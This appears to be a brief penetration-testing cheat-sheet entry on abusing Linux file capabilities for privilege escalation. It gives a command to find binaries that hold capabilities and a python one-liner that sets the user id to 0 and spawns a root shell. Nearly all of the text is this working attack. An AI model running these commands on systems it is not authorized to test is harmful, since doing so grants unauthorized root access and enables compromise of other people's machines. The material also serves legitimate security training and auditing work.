"Better" than SUID but vulnerable in the same way
Last updated 2 years ago
In short, "capability" is a "safer" version of SUID. However, it is still vulnerable in certain cases.
Search for capabilities:
getcap -r / 2>/dev/null
Suppose /usr/bin/python2.6 has all capabilities:
/usr/bin/python2.6
Spawn a root shell:
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
